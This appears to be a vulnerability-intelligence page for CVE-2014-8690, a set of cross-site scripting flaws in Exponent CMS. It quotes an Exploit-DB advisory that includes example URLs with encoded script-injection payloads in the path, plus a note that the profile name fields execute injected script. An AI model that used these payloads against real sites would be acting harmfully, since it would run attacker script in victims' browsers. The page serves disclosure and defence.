VIR Vulnerability Intelligence Relay

CVE-2014-8690

medium
Published 2015-02-19 ยท Modified 2026-05-06
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in Exponent CMS before 2.1.4 patch 6, 2.2.x before 2.2.3 patch 9, and 2.3.x before 2.3.1 patch 4 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, the (2) src parameter in a none action to index.php, or the (3) "First Name" or (4) "Last Name" field to users/edituser.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-36059 webapps php text ยท 2 KB
Mayuresh Dani ยท 2015-02-12

Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities

text exploit Source: Exploit-DB 
######################
# Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies
# Discovered by-
# Mayuresh Dani (mdani@qualys.com)
# Narendra Shinde (nshinde@qualys.com)
# Vendor Homepage: http://www.exponentcms.org/
# Software Link:
http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download
# Version: 2.3.1
# Date: 2014-10-11
# Tested on: Windows 7 / Mozilla Firefox
#            Ubuntu 14.04 / Mozilla Firefox
# CVE: CVE-2014-8690
######################
# Vulnerability Disclosure Timeline:
# 2014-11-04:  Discovered vulnerability
# 2014-11-04:  Vendor Notification
# 2014-11-05:  Vendor confirmation
# 2014-11-06:  Vendor fixes Universal XSS -
http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0
# 2015-02-12:  Public Disclosure
######################
# Description
# Exponent CMS is a free, open source, open standards modular enterprise
software framework and content management system (CMS) written in the PHP.
#
# CVE-2014-8690:
# Universal XSS - Exponent CMS builds the canonical path field from an
unsanitized URL, which can be used to execute arbitrary scripts.
# Examples:
#
http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c
#
http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
# 2.b. XSS in user profiles.
# The "First Name" and "Last Name" fields on
http://server/exponent/users/edituser are not sufficiently sanitized. Enter
your favourite script and the application will execute it everytime for you.
#
# More information and PoCs -
http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior
#
#
# Thanks,
# Mayuresh & Narendra

Application impact
VendorProductVersionsFixed
exponentcmsexponent_cms{"endIncluding":"2.1.4"}
exponentcmsexponent_cms2.2.0
exponentcmsexponent_cms2.2.1
exponentcmsexponent_cms2.2.2
exponentcmsexponent_cms2.2.3
exponentcmsexponent_cms2.3.0
exponentcmsexponent_cms2.3.1

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.